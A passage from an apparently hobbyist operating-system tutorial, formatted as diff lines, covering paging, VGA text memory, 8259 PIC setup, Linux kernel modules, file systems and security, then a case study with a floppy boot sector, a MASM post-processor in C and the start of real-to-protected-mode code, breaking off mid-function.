+Most production operating systems use paging as a way to augment the
+address space which the OS manages. Paging is complicated, and involves
+a lot of dedicated code, and this code frequently executes ... which
+adds up to a tremendous loss in performance. Disk I/O is probably the
+most costly operation an isolated computer can perform. Even with
+the bookkeeping being pushed down to the hardware, paging eats up time.
+
+Barry Brey, who is an expert on the Intel chip set, told me that paging on
+Windows eats up about 10% of the execution time. In fact, paging is so
+costly, in terms of execution time, and RAM is so cheap that it is
+often a better idea to buy more memory and turn off paging anyways.
+In light of this, you shouldn't feel like paging is a necessity. If you
+are designing an embedded OS, you won't need paging anyways.
+
+Back when primary memory cores were 16KB, and those little magnets were
+big ticket items, paging probably made a whole lot more sense. Today,
+however, buying a couple GB of SDRAM is not uncommon and this causes me
+to speculate that maybe paging is a relic of the past.
+
+--[ 2.3 - I/O interface
+
+This is the scary part.
+
+You now have processes, and they live in memory. But they cannot interact
+with the outside world without connections to I/O devices. Connecting to
+I/O devices is traditionally performed by sections of code called drivers,
+which are traditionally buried in the bowels of the OS. As with other
+components of the OS, you will have to use your assembly language skills.
+
+In Intel protected mode, using the BIOS to get data to the screen is not
+an option because the old real-mode way of handling interrupts and
+addressing memory is no longer valid. One way to send messages to the
+screen is to write directly to video memory. Most monitors, even flat
+panels, start up in either VGA 80x25 monochrome text mode or VGA 80x25
+color text mode.
+
+	memory region	real-mode address    linear address of buffer
+	-------------   -----------------    ----------------------
+	monochrome text   B000[0]:0000          B0000H
+	color text		  B800[0]:0000          B8000H
+
+In either case, the screen can display 80 rows and 25 columns worth of
+character data. Each character takes up two bytes in the video RAM memory
+region ( which isn't so bad ... 80x25=2000x2=4000 bytes ). You can place
+a character on the screen by merely altering the contents of video RAM.
+The lower byte holds the ASCII character, and the high byte holds an
+attribute.
+
+The attribute bit is organized as follows:
+
+		           bit 7   blink
+				   ---------------
+				   bit 6
+				   bit 5   background color ( 0H=black )
+				   bit 4
+				   ---------------
+				   bit 3
+				   bit 2   foreground color ( 0EH=white )
+				   bit 1
+				   bit 0
+
+To handle multiple screens, you merely create screen buffers and then
+commit the virtual screen to video RAM when you want to see it.
+For example, in protected mode the following code ( written with DJGPP )
+will place a 'J' on the screen.
+
+		#include <sys/farptr.h>
+        #include <go32.h>
+		_farpokeb(_dos_ds, 0xB8000, 'J');
+		_farpokeb(_dos_ds, 0xB8000+1, 0x0F);
+
+When I saw the following snippet of code in Minix's console.c file,
+I knew that Minix used this technique to write to the screen.
+
+#define MONO_BASE    0xB0000L	/* base of mono video memory */
+#define COLOR_BASE   0xB8000L	/* base of color video memory */
+		:
+		:
+PUBLIC void scr_init(tp)
+tty_t *tp;
+{
+		:
+		:
+  if (color)
+  {
+	vid_base = COLOR_BASE;
+	vid_size = COLOR_SIZE;
+  }
+  else
+  {
+	vid_base = MONO_BASE;
+	vid_size = MONO_SIZE;
+  }
+		:
+		:
+
+Handling I/O to other devices on the Intel platform is no where nearly
+as simple. This is where our old friend the 8259 Programmable Interrupt
+Controller (PIC) comes into play. Recently I have read a lot in Intel
+docs about an advanced PIC (i.e. APIC), but everyone still seems to be
+sticking to the old interrupt controller.
+
+The 8259 PIC is the hardware liaison between the hardware and the processor.
+The most common setup involves two 8259 PICs configured in a master-slave
+arrangement. Each PIC has eight interrupt request lines (IRQ lines) that
+receive data from external devices ( i.e. the keyboard, hard drive, etc. ).
+The master 8259 will use its third pin to latch on to the slave 8259
+so that, all told, they provide 15 IRQ lines for external hardware. The
+master 8259 then communicates to the CPU through the CPUs INTR interrupt
+PIN. The slave 8259 uses it's INTR slot to speak to the master on its
+third IRQ line.
+
+Normally the BIOS will program the 8259 when then computer boots, but
+to talk to hardware devices in protected mode, the 8259 must be
+re-programmed. This is because the 8259 couples the IRQ lines to
+interrupt signals. Programming the 8259 will make use of the IN and OUT
+instructions. You basically have to send 8-bit values to the 8259's
+interrupt command register (ICR) and interrupt mask register (IMR)
+in a certain order. One wrong move and you triple-fault.
+
+My favorite example of programming the 8259 PIC comes from MMURTL. The
+following code is located in INITCODE.INC and is invoked during the
+initialization sequence in MOS.ASM.
+
+;=========================================================================
+; This sets IRQ00-0F vectors in the 8259s
+; to be Int20 thru 2F.
+;
+; When the PICUs are initialized, all the hardware interrupts are MASKED.
+; Each driver that uses a hardware interrupt(s) is responsible
+; for unmasking that particular IRQ.
+;
+PICU1          EQU 0020h
+PICU2          EQU 00A0h
+
+Set8259 PROC NEAR
+		MOV AL,00010001b
+		OUT PICU1+0,AL          	;ICW1 - MASTER
+		jmp $+2
+		jmp $+2
+		OUT PICU2+0,AL          	;ICW1 - SLAVE
+		jmp $+2
+		jmp $+2
+		MOV AL,20h
+		OUT PICU1+1,AL          	;ICW2 - MASTER
+		jmp $+2
+		jmp $+2
+		MOV AL,28h
+		OUT PICU2+1,AL          	;ICW2 - SLAVE
+		jmp $+2
+		jmp $+2
+		MOV AL,00000100b
+		OUT PICU1+1,AL          	;ICW3 - MASTER
+		jmp $+2
+		jmp $+2
+		MOV AL,00000010b
+		OUT PICU2+1,AL          	;ICW3 - SLAVE
+		jmp $+2
+		jmp $+2
+		MOV AL,00000001b
+		OUT PICU1+1,AL          	;ICW4 - MASTER
+		jmp $+2
+		jmp $+2
+		OUT PICU2+1,AL          	;ICW4 - SLAVE
+		jmp $+2
+		jmp $+2
+		MOV AL,11111010b			;Masked all but cascade/timer
+;		MOV AL,01000000b			;Floppy masked
+		OUT PICU1+1,AL          	;MASK - MASTER (0= Ints ON)
+		jmp $+2
+		jmp $+2
+		MOV AL,11111111b
+;		MOV AL,00000000b
+		OUT PICU2+1,AL          	;MASK - SLAVE
+		jmp $+2
+		jmp $+2
+		RETN
+SET8259	ENDP
+;=========================================================================
+
+Note how Burgess performs two NEAR jumps after each OUT instruction. This
+is to give the PIC time to process the command.
+
+Writing a driver can be a harrowing experience. This is because drivers
+are nothing less than official members of the kernel memory image. When
+you build a driver, you are building a part of the OS. This means that
+if you incorrectly implement a driver, you could be dooming your system
+to a crash of the worst kind ... death by friendly fire.
+
+Building drivers is also fraught with all sorts of vendor-specific byte
+encoding and bit wise acrobatics. The best advise that I can give you is
+to stick to widely-used, commodity, hardware. Once you have a working
+console, you can attempt to communicate with a disk drive and then maybe
+a network card.
+
+You might want to consider designing your OS so that drivers can be
+loaded and unloaded at runtime. Having to recompile the kernel to
+accommodate a single driver is a pain. This will confront you with
+creating an indirect calling mechanism so that the OS can invoke the
+driver, even though it does not know in advance where that driver is.
+
+The Linux kernel allows code to be added to the kernel at runtime
+via loadable kernel modules (LKMs). These dynamically loadable modules
+are nothing more than ELF object files ( they've been compiled, but
+not officially linked ). There are a number of utilities that can
+be used to manage LKMs. Two of the most common are insmod and rmmod,
+which are used to insert and remove LKMs at runtime.
+
+The insmod utility acts as a linker/loader and assimilates the LKM into
+the kernel's memory image. Insmod does this by invoking the init_module
+system call. This is located in /usr/src/linux/kernel/module.c.
+
+asmlinkage long
+sys_init_module(const char *name_user, struct module *mod_user){ ...
+
+This function, in turn, invokes another function belonging to the LKM
+which also just happens to be named init_module(). Here is a the
+relevant snippet from sys_init_module():
+
+	/* Initialize the module.  */
+	atomic_set(&mod->uc.usecount,1);
+	mod->flags |= MOD_INITIALIZING;
+	if (mod->init && (error = mod->init()) != 0)
+	{
+		atomic_set(&mod->uc.usecount,0);
+		mod->flags &= ~MOD_INITIALIZING;
+		if (error > 0)	/* Buggy module */
+			error = -EBUSY;
+		goto err0;
+	}
+	atomic_dec(&mod->uc.usecount);
+
+The LKM's init_module() function, which is pointed to by the kernel code
+above, then invokes a kernel routine to register the LKMs subroutines.
+Here is a simple example:
+
+	/* Initialize the module - Register the character device */
+	int init_module()
+	{
+		/* Register the character device (atleast try) */
+		Major = module_register_chrdev(	0,
+										DEVICE_NAME,
+										&Fops);
+
+		/* Negative values signify an error */
+		if (Major < 0)
+		{
+			printk ("%s device failed with %d\n",
+	                "Sorry, registering the character",
+	                Major);
+			return Major;
+		}
+
+		printk ("%s The major device number is %d.\n",
+                "Registeration is a success.",
+                Major);
+		printk ("If you want to talk to the device driver,\n");
+		printk ("you'll have to create a device file. \n");
+		printk ("We suggest you use:\n");
+		printk ("mknod <name> c %d <minor>\n", Major);
+		printk ("You can try different minor numbers %s",
+                "and see what happens.\n");
+
+		return 0;
+	}
+
+The Unix OS, in an attempt to simply things, treats every device like a
+file. This is done in order to keep the number of system calls down and
+to offer a uniform interface from one hardware subsystem to the next.
+This is an approach worth considering. However, on the other hand, the
+Unix approach have not always gotten a good grade in terms of ease of use.
+Specifically, I have heard complaints about mounting and un-mounting from
+Windows users who migrate to Unix.
+
+Note, If you do take the LKM route, you should be careful not to make
+the loadable driver feature into a security flaw.
+
+With regard to nuts-and-bolts details, for the Intel platform, I would
+recommend Frank Van Gilluwe's book. If you are not targeting Intel, then
+you have some real digging to do. Get on the phone and the internet and
+contact your hardware vendors.
+
+--[ 2.4 - File System
+
+You now have processes, in memory, that can talk to the outside world.
+The final step is to give them a way of persisting and organizing data.
+
+In general, you will build the file system manager on top of the disk
+drivers that you implemented earlier in the last step. If your OS is
+managing an embedded system, you may not need to implement a file system
+because no disk hardware exists. Even with embedded systems, though, I've
+seen file systems implemented as RAM disks. Even embedded systems
+sometimes need to produce and store log files ....
+
+There are several documented files system specifications available to the
+public, like the ext2 file system made famous by Linux. Here is the main
+link for the ext2 implementation:
+
+		http://e2fsprogs.sourceforge.net/ext2.html
+
+The documentation at this site should be sufficient to get you started.
+In particular, there is a document named "Design and Implementation of
+the Second Extended File System" which I found to be a well-rounded
+introduction to ext2.
+
+If you have the Linux kernel source and you want to take a look at the
+basic data structures of the ext2fs, then look in:
+
+			/usr/src/linux/include/linux/ext2_fs.h
+			/usr/src/linux/include/linux/ext2_fs_i.h
+
+To take a look at the functions that manipulate these data structures,
+take a look in the following directory:
+
+					/usr/src/linux/fs/ext2
+
+In this directory you will see code like:
+
+#include <linux/module.h>
+
+MODULE_AUTHOR("Remy Card and others");
+MODULE_DESCRIPTION("Second Extended Filesystem");
+MODULE_LICENSE("GPL");
+
+in inode.c, and in super.c you will see:
+
+EXPORT_NO_SYMBOLS;
+
+module_init(init_ext2_fs)
+module_exit(exit_ext2_fs)
+
+Obviously, from the previous discussion, you should realize that support
+for ext2fs can be provided by an LKM!
+
+Some OS creators, like Burgess, go the way of the MS-DOS FAT file system,
+for the sake of simplicity, and so they didn't have to reformat their
+hard drives. I wouldn't recommend the FAT system. In general, you might
+want to keep in mind that it is a good idea to implement a file system
+which facilitates file ownership and access controls. More on this in the
+next section ...
+
+--[ 2.5 - Notes On Security
+
+Complexity is the enemy of security. Simple procedures are easy to check
+and police, complicated ones are not. Any certified accountant will tell
+you that our Byzantine tax laws leave all sorts of room for abuse.
+
+Software is the same way. Complicated source code has the potential to
+provide all sorts of insidious places for bugs to hide. As operating
+systems have evolved they have become more complicated. According to
+testimony given by a Microsoft executive on Feb. 2, 1999, Windows 98
+consists of over 18 million lines of code. Do you think there is a bug
+in there somewhere? Oh, ... no ... Microsoft wouldn't sell buggy code ...
+
+<picture Dr. Evil, a la Austin Powers, saying the previous sentence>
+
+Security is not something that you want to add on to your OS when you are
+almost done with it. Security should be an innate part of your system's
+normal operation. Keep this in mind during every phase of construction,
+from task management to the file system manager.
+
+In addition, you might consider having a creditable third party perform
+an independent audit of your security mechanisms before you proclaim
+your OS as being 'secure.' For example, the NSA evaluates 'trusted'
+operating systems on a scale from C2 to A1.
+
+A 'trusted' OS is just an OS which has security policies in place. The
+salient characteristic of a trusted system is the ranking which the
+NSA gives it. A C2 trusted system has only limited access and
+authentication controls. An A1 trusted system, at the other end of the
+spectrum, has rigorous and mandatory security mechanisms.
+
+People who have imaginary enemies are called 'paranoid.' People who have
+enemies that they think are imaginary are called 'victims.' It's often
+hard to tell the two apart until its too late. If I had to trust my
+business to an OS, I would prefer to invest in one that errs on the side
+of paranoia.
+
+--[ 3 - Simple Case Study
+
+In this section, I present you with some home-brewed system code in an
+effort to highlight some of the issues that I talked about in Part 1.
+
+--[ 3.1 - Host Platform
+
+For a number of reasons, I decided to take a shortcut and create an OS
+that runs on Intel 8x86 hardware. Cost was one salient issue, and so was
+the fact that there are several potential host operating systems to choose
+from ( Linux, OpenBSD, MMURTL, Windows, etc. ).
+
+The primary benefit, however, is that I can avoid ( to an extent ) having
+to build a cross-compiler and simulator from scratch. By having the host
+and target systems run on the same hardware, I was able to take advantage
+of existing tools that generated x86 binaries and emulated x86 hardware.
+
+For the sake of appealing to the least common denominator, I decided to
+use Windows as a host OS. Windows, regardless of its failings, happens
+to be have the largest base of users. Almost anyone should be able to
+follow the issues and ideas I discuss in Part 3.
+
+One side benefit of choosing Windows is that it ships with its own
+simulator. The DOS Virtual Machine subsystem is basically a crudely
+implemented 8086 simulator. I say 'crude' because it doesn't have the
+number or range of features that bochs provides. I actually tested a lot
+of code within the confines of the DOS VM.
+
+--[ 3.2 - Compiler Issues
+
+There are dozens of C compilers that run on Windows. I ended up having
+three requirements for choosing one:
+
+		i-		generates raw binary ( i.e.  MS .COM file )
+
+		ii-		allow for special in-line instructions (i.e. INT, LGDT )
+
+		iii-	is free
+
+Intel PCs boot into real-mode, which means that I will need to start the
+party with a 16-bit compiler. In addition, system code must be raw binary
+so that runtime address fix ups do not have to be manually implemented.
+This is not mandatory, but it would make life much easier.
+
+The only commercial compilers that generated 16-bit, raw binary, files
+passed out of fashion years ago ... so I had to do some searching.
+
+After trolling the net for compilers, I ended up with the following matrix:
+
+	compiler		decision	reason
+	--------    	--------    ------
+	TurboC			NO			in-line assembly requires TASM ($$$)
+	Micro-C			YES			generates MASM friendly output
+	PacificC    	NO			does not support tiny MM (i.e. .COM)
+	Borland 4.5C++  NO          costs $$$
+	VisualC++ 1.52  NO			costs $$$
+	Watcom			NO			does not support tiny MM (i.e. .COM)
+	DJGPP			NO			AT&T assembler syntax ( yuck )
+
+I Ended up working with Micro-C, even though it does not support the entire
+ANSI standard. The output of Micro-C is assembler and can be fed to MASM
+without to much trouble. Micro-C was created by Dave Dunfield and can be
+found at:
+
+				ftp://ftp.dunfield.com/mc321pc.zip
+
+Don't worry about the MASM dependency. You can now get MASM 6.1 for free
+as a part of the Windows DDK. See the following URL for details:
+
+http://www.microsoft.com/ddk/download/98/BINS_DDK.EXE
+http://download.microsoft.com/download/vc15/Update/1/WIN98/EN-US/Lnk563.exe
+
+The only downside to obtaining this 'free' version of MASM ( i.e. the
+ML.EXE,ML.err, and LINK.EXE files ) is that they come with zero documents.
+
+Ha ha, the internet to the rescue ....
+
+				http://webster.cs.ucr.edu/Page_TechDocs/MASMDoc
+
+By using Micro-C, I am following the advice I gave in Part 1 and sticking
+to the tools that I am skilled with. I grew up using MASM and TASM. I am
+comfortable using them at the command line and reading their listing
+files. Because MASM is the free tool I picked it over TASM, even if it is
+a little buggy.
+
+One problem with using most C compilers to create OS code is that they all
+add formatting information to the executable files they generate. For
+example, the current version of Visual C++ creates console binaries that
+obey the Portable Executable (PE) file format. This extra formatting is
+used by the OS program loader at runtime.
+
+Compilers also tack on library code to their executables, even when they
+don't need it.
+
+Consider a text file named file.c consisting of the code:
+
+						void main(){}
+
+I am going to compile this code as a .COM file using TurboC. Take a look at
+the size of the object file and final binary.
+
+C:\DOCS\OS\lab\testTCC>tcc -mt -lt -ln file.c
+C:\DOCS\OS\lab\testTCC>dir
+
+.              <DIR>        03-29-02  9:26p .
+..             <DIR>        03-29-02  9:26p ..
+FILE     C              19  03-30-02 12:07a file.c
+FILE     OBJ           184  03-30-02 12:09a FILE.OBJ
+FILE     COM         1,742  03-30-02 12:09a file.com
+
+
+Holy smokes... there's a mother load of ballast that the compiler adds on.
+This is strictly the doing of the compiler and linker. Those bastards!
+
+To see how excessive this actually is, let's look at a .COM file which
+is coded in assembler. For example, let's create a file.asm that looks
+like:
+
+CSEG SEGMENT
+start:
+ADD ax,ax
+ADD ax,cx
+CSEG ENDS
+end start
+
+We can assemble this with MASM
+
+C:\DOCS\OS\lab\testTCC>ml /AT file.asm
+C:\DOCS\OS\lab\testTCC>dir
+
+.              <DIR>        03-29-02  9:26p .
+..             <DIR>        03-29-02  9:26p ..
+FILE     OBJ            53  03-30-02 12:27a file.obj
+FILE     ASM            67  03-30-02 12:27a file.asm
+FILE     COM             4  03-30-02 12:27a file.com
+         5 file(s)            187 bytes
+         2 dir(s)        7,463.23 MB free
+
+
+As you can see, the executable is only 4 bytes in size! The assembler
+didn't add anything, unlike the C compiler, which threw in everything but
+the kitchen sink. In all likelihood, the extra space is probably taken
+up by libraries which the linker appends on.
+
+The painful truth is, unless you want to  build your own backend to a
+C compiler, you will be faced with extra code and data on your OS binary.
+One solution is simply to ignore the additional bytes. Which is to say
+that the OS boot loader will simply skip the formatting stuff and go right
+for the code which you wrote. If you decide to take this route, you might
+want to look at a hex dump of your binary to determine the file offset at
+which your code begins.
+
+I escaped dealing with this problem because Micro-C's C compiler (MCC)
+spits out an assembly file instead of object code. This provided me with
+the opportunity to tweak and remove any extra junk before it gets a
+chance to find its way into the executable.
+
+However, I still had problems...
+
+For example, the MCC compiler would always add extra segments and
+place program elements in them. Variables translated to assembler would
+always be prefixed with these unwanted segments (i.e. OFFSET DGRP:_var ).
+
+Take the program:
+
+char arr[]={'d','e','v','m','a','n','\0'};
+void main(){}
+
+MCC will process this file and spit out:
+
+DGRP GROUP DSEG,BSEG
+DSEG SEGMENT BYTE PUBLIC 'IDATA'
+DSEG ENDS
+BSEG SEGMENT BYTE PUBLIC 'UDATA'
+BSEG ENDS
+CSEG SEGMENT BYTE PUBLIC 'CODE'
+ASSUME CS:CSEG, DS:DGRP, SS:DGRP
+EXTRN ?eq:NEAR,?ne:NEAR,?lt:NEAR,?le:NEAR,?gt:NEAR
+EXTRN ?ge:NEAR,?ult:NEAR,?ule:NEAR,?ugt:NEAR,?uge:NEAR
+EXTRN ?not:NEAR,?switch:NEAR,?temp:WORD
+CSEG ENDS
+DSEG SEGMENT
+PUBLIC _arr
+_arr DB 100,101,118,109,97,110,0
+DSEG ENDS
+CSEG SEGMENT
+PUBLIC _main
+_main: PUSH BP
+MOV BP,SP
+POP BP
+RET
+CSEG ENDS
+END
+
+Rather than re-work the backend of the compiler, I implemented a more
+immediate solution by creating a hasty post-processor. The alternative
+would have been to manually adjust each assembly file that MCC produced,
+and that was just too much work.
+
+The following program ( convert.c ) creates a skeleton .COM program of the
+form:
+
+	.486
+	CSEG SEGMENT BYTE USE16 PUBLIC 'CODE'
+
+	ORG 100H ; for DOS PSP only, strip and start OS on 0x0000 offset
+
+	here:
+	JMP _main
+
+	; --> add stuff here <----
+
+	EXTRN ?eq:NEAR,?ne:NEAR,?lt:NEAR,?le:NEAR,?gt:NEAR
+	EXTRN ?ge:NEAR,?ult:NEAR,?ule:NEAR,?ugt:NEAR,?uge:NEAR
+	EXTRN ?not:NEAR,?switch:NEAR,?temp:WORD
+
+	CSEG ENDS
+	END here
+
+It then picks out the procedures and data elements in the original
+assembly program and places them in the body of the skeleton. Here is the
+somewhat awkward, but effective program that performed this task:
+
+/* convert.c------------------------------------------------------------*/
+
+#include<stdio.h>
+#include<string.h>
+
+/* read a line from fptr, place in buff */
+
+int getNextLine(FILE *fptr,char *buff)
+{
+	int i=0;
+	int ch;
+
+	ch = fgetc(fptr);
+	if(ch==EOF){ buff[0]='\0'; return(0); }
+
+	while((ch=='\n')||(ch=='\r')||(ch=='\t')||(ch==' '))
+	{
+		ch = fgetc(fptr);
+		if(ch==EOF){ buff[0]='\0'; return(0); }
+	}
+
+	while((ch!='\n')&&(ch!='\r'))
+	{
+		if(ch!=EOF){ buff[i]=(char)ch; i++; }
+		else
+		{
+			buff[i]='\0';
+			return(0);
+		}
+
+		ch = fgetc(fptr);
+	}
+
+	buff[i]='\r';i++;
+	buff[i]='\n';i++;
+	buff[i]='\0';
+
+	return(1);
+
+}/*end getNextLine*/
+
+/* changes DGRP:_variable  to CSEG:_variable */
+
+void swipeDGRP(char *buff)
+{
+	int i;
+	i=0;
+	while(buff[i]!='\0')
+	{
+		if((buff[i]=='D')&&
+			(buff[i+1]=='G')&&
+			(buff[i+2]=='R')&&
+			(buff[i+3]=='P'))
+		{
+			buff[i]='C';buff[i+1]='S';buff[i+2]='E';buff[i+3]='G';
+		}
+		if((buff[i]=='B')&&
+			(buff[i+1]=='G')&&
+			(buff[i+2]=='R')&&
+			(buff[i+3]=='P'))
+		{
+			buff[i]='C';buff[i+1]='S';buff[i+2]='E';buff[i+3]='G';
+		}
+		i++;
+	}
+	return;
+}/*end swipeDGRP*/
+
+void main(int argc, char *argv[])
+{
+	FILE *fin;
+	FILE *fout;
+
+	/*MASM allows lines to be 512 chars long, so have upper bound*/
+
+	char buffer[512];
+	char write=0;
+
+	fin = fopen(argv[1],"rb");
+	printf("Opening %s\n",argv[1]);
+	fout = fopen("os.asm","wb");
+
+	fprintf(fout,".486P ; enable 80486 instructions\r\n");
+	fprintf(fout,"CSEG SEGMENT BYTE USE16 PUBLIC \'CODE\'\r\n");
+	fprintf(fout,";\'USE16\' forces 16-bit offset addresses\r\n");
+	fprintf(fout,"ASSUME CS:CSEG, DS:CSEG, SS:CSEG\r\n");
+	fprintf(fout,"ORG 100H\r\n");
+	fprintf(fout,"here:\r\n");
+	fprintf(fout,"JMP _main\r\n\r\n");
+
+	fprintf(fout,"EXTRN ?eq:NEAR,?ne:NEAR,?lt:NEAR,?le:NEAR,?gt:NEAR\r\n");
+	fprintf(fout,"EXTRN ?ge:NEAR,?ult:NEAR,?ule:NEAR,?ugt:NEAR,?uge:NEAR\r\n");
+	fprintf(fout,"EXTRN ?not:NEAR,?switch:NEAR,?temp:WORD\r\n\r\n");
+
+	while(getNextLine(fin,buffer))
+	{
+		if((buffer[0]=='P')&&
+			(buffer[1]=='U')&&
+			(buffer[2]=='B')&&
+			(buffer[3]=='L')&&
+			(buffer[4]=='I')&&
+			(buffer[5]=='C')){ fprintf(fout,"\r\n"); write=1;}
+
+		if((buffer[0]=='D')&&
+			(buffer[1]=='S')&&
+			(buffer[2]=='E')&&
+			(buffer[3]=='G')){ write=0;}
+
+		if((buffer[0]=='B')&&
+			(buffer[1]=='S')&&
+			(buffer[2]=='E')&&
+			(buffer[3]=='G')){ write=0;}
+
+		if((buffer[0]=='R')&&
+			(buffer[1]=='E')&&
+			(buffer[2]=='T')){ fprintf(fout,"%s",buffer); write=0;}
+
+		if(write)
+		{
+			swipeDGRP(buffer);
+			fprintf(fout,"%s",buffer);
+		}
+		buffer[0]='\0';
+	}
+
+	fprintf(fout,"CSEG ENDS\r\n");
+	fprintf(fout,"END here\r\n");
+
+	fclose(fin);
+	fclose(fout);
+	return;
+
+}/*end main-------------------------------------------------------------*/
+
+--[ 3.3 - Booting Up
+
+In the following discussion, I'm going to discuss booting from a floppy
+disk. Booting from a hard drive, CD-ROM, or other storage device is
+typically a lot more complicated due to partitioning and device formatting.
+
+OK, the first thing I'm going to do is build a boot program. This program
+has to be small. In fact, it has to be less than 512 bytes in size because
+it has to fit on the very first logical sector of the floppy disk. Most
+1.44 floppy disks have 80 tracks per side and 18 sectors per track. The
+BIOS labels the two sides ( 0,1 ), tracks 0-79, and sectors 1-18.
+
+When an Intel machine boots, the BIOS firmware (which resides
+in a ROM chip on the motherboard) will look for a bootable storage
+device. The order in which it does so can be configured on most machines
+via a BIOS startup menu system. If the BIOS finds a boot diskette, it will
+read the diskettes boot sector (Track 0, Side 0 and Sector 1) into memory
+and execute the boot sector code. Some times this code will do nothing
+more than print a message to the screen:
+
+					Not a boot disk, you are hosed.
+
+All 8x86 machines start in real-mode, and the boot sector is loaded into
+memory at the address 0000[0]:7C00 ( or 0x07C00 ) using hexadecimal. Once
+this occurs, the BIOS washes its hands of the booting procedure and we
+are left to our own devices.
+
+Many operating systems will have the boot sector load a larger boot
+program, which then loads the OS proper. This is known as a multi-stage
+boot. Large operating systems that have a lot of things to set up,
+a complicated file structure, and flexible configuration, will utilize
+a multi-stage boot loader. A classic example of this is GNU's GRand
+Unified Bootloader ( GRUB ).
+
+				http://www.gnu.org/software/grub
+
+As usual, I am going to take the path of least resistance. I am going to
+have the boot sector directly load my system code. The boot sector assumes
+that the system code  will be located directly after the boot sector
+(track 0, side, 0, sector 2 ). This will save me from including special
+data and instructions to read a file system. Finally, because of size
+constraints, all the code in this section will be written in assembler.
+
+The boot code follows:
+
+;-boot.asm----------------------------------------------------------------
+
+.8086
+CSEG SEGMENT
+start:
+
+; step 1) load the OS on floppy
+;         to location above the
+;         existing interrupt table (0-3FF)
+;         and BIOS data region (400-7FF)
+
+MOV AH,02H ; read command
+MOV AL,10H ; 16 sectors = 8KB of storage to load
+MOV CH,0H  ; low 8 bits of track number
+MOV CL,2H  ; sector start ( right after boot sector )
+MOV DH,0H  ; side
+MOV DL,0H  ; drive
+MOV BX,CS
+MOV ES,BX  ; segment to load code
+MOV BX,0H
+MOV BX,800H  ; offset to load code ( after IVT )
+INT 13H
+
+; signal that code was loaded and we are going to jump
+
+MOV AH,0EH
+MOV AL,'-'
+INT 10H
+MOV AH,0EH
+MOV AL,'J'
+INT 10H
+MOV AH,0EH
+MOV AL,'M'
+INT 10H
+MOV AH,0EH
+MOV AL,'P'
+INT 10H
+MOV AH,0EH
+MOV AL,'-'
+INT 10H
+
+; step 2) jump to the OS
+;         bonzai!!!
+
+JMP BX
+
+CSEG ENDS
+END start
+
+;-end file----------------------------------------------------------------
+
+This boot loader also assumes that the system code to be loaded lies
+in sectors 2-17 on the first track. As the OS gets bigger ( beyond 8K ),
+extra instructions will be needed to load the additional code. But for now
+lets assume that the code will be less than 8K in size.
+
+OK, you should build the above code as a .COM file and burn it on to the
+boot sector. The boot.asm file is assembled via:
+
+			C:\> ML  /AT  boot.asm
+
+How do you do burn it on to the floppy disk's boot sector?
+
+Ah ha! Debug to the rescue. Note, for big jobs I would recommend rawrite.
+This is such a small job that debug will suffice. Not to mention, I have
+nostalgic feeling about debug. I assembled my first program with it; back
+in the 1980s when parachute pants were in.
+
+Assuming the boot code has been assembled to a file named boot.COM, here
+is how you would write it to the boot sector of a floppy disk.
+
+C:\DOCS\OS\lab\bsector>debug showmsg.com
+-l
+-w cs:0100 0 0 1
+-q
+C:\DOCS\OS\lab\bsector>
+
+The 'l' command loads the file to memory starting at CS:0100 hex.
+The 'w' command writes this memory to disk A ( 0 ) starting at sector 0
+and writing a single sector. The 'w' command has the general form:
+
+				w  address  drive  start-sector  #-sectors
+
+Note, DOS sees logical sectors ( which start with 0 ), whereas
+physical (BIOS manipulated) sectors always start with 1.
+
+If you want to test this whole procedure, assemble the following program
+as a .COM file and burn it on to the boot sector of a diskette with debug.
+
+.486
+CSEG SEGMENT
+start:
+MOV AH,0EH
+MOV AL,'-'
+INT 10H
+MOV AH,0EH
+MOV AL,'h'
+INT 10H
+MOV AH,0EH
+MOV AL,'i'
+INT 10H
+MOV AH,0EH
+MOV AL,'-'
+INT 10H
+lp LABEL NEAR
+JMP lp
+CSEG ENDS
+END start
+
+This will print '-hi-' to the console and then loop. It's a nice way to
+break the ice and build your confidence. Especially if you've never
+manually meddled with disk sectors.
+
+--[ 3.4 - Initializing The OS
+
+The boot sector loads the system code binary into memory and then sets
+CS and IP to the first ( lowest ) byte of the code's instructions. My
+system code doesn't do anything more than print a few messages and then
+jump to protected mode. Execution ends in an infinite loop.
+
+I wrote the program using real-mode instructions. Intel machines all
+start up in real-mode. It is the responsibility of this initial code to
+push the computer into protected memory mode. Once in protected mode,
+the OS will adjust its segment registers, set up a stack, and establish
+an execution environment for applications ( process table, drivers, etc.).
+
+This made life difficult because if I could only go so far using
+real-mode instructions and registers. Eventually, I would need to
+use the extended registers (i.e. EAX ) to access memory higher up.
+
+Some compilers won't accept a mixture of 16-bit and 32-bit
+instructions, or they get persnickety and encode instructions incorrectly.
+If you look at the FAR JMP that I make at the end of setUpMemory(), you'll
+notice that I had to code it manually.
+
+My situation was even more tenuous because I was fitting everything into a
+single segment. Once I had made the translation to protected mode, there
+wasn't that much that I could do that was very interesting.
+
+One solution would be to convert my 16-bit system code into the second
+phase of a multi-stage boot process. In other words, have the system code,
+which was loaded by the boat sector, load a 32-bit binary into memory
+before it makes the transition to protected mode. When the FAR JMP is
+executed, it could send execution to the 32-bit code ... which could then
+take matters from there. If you look at MMURTL, you will see that this
+is exactly what Burgess does. Doh! I just wish I had known sooner.
+
+I was excited initially by the thought of being able to leverage the Micro-
+C compiler. However, as you will see, most of the set up work was done
+via in-line assembly. Only small portions were pure C. This is the nature
+of initializing an OS. Key memory and task management functions are
+anchored directly to the hardware, and the best that you can hope for is
+to bury the assembly code deep in the bowels of the OS and wrap everything
+in C.
+
+Here is the system code (os.c), in all its glory:
+
+/* os.c ----------------------------------------------------------------*/
+
+void printBiosCh(ch)
+char ch;
+{
+	/*
+	ch = BP + savedBP + retaddress = BP + 4 bytes
+	*/
+	asm "MOV AH,0EH";
+	asm "MOV AL,+4[BP]";
+	asm "INT 10H";
+	return;
+}/*end printBiosCh---------------------------------------*/
+
+void printBiosStr(cptr,n)
+char* cptr;
+int n;
+{
+	int i;
+	for(i=0;i<n;i++){ printBiosCh(cptr[i]); }
+	return;
+}/*end printBiosStr--------------------------------------*/
+
+void setUpMemory()
+{
+	/*going to protected mode is an 6-step dance*/
+
+	/* step 1) build GDT ( see GDT table in function below )*/
+	printBiosCh('1');
+
+	/*
+	step 2) disable interrupts so we can work undisturbed
+	( note, once we issue CLI, we cannot use BIOS interrupts
+	  to print data to the screen )
+	*/
+
+	printBiosCh('2');
+	asm "CLI";
+
+	/*
+	step 3) enable A20 address line via keyboard controller
+	        60H = status port, 64H = control port on 8042
+	*/
+
+	asm "MOV AL,0D1H";
+	asm "OUT 64H,AL";
+	asm "MOV AL,0DFH";
+	asm "OUT 60H,AL";
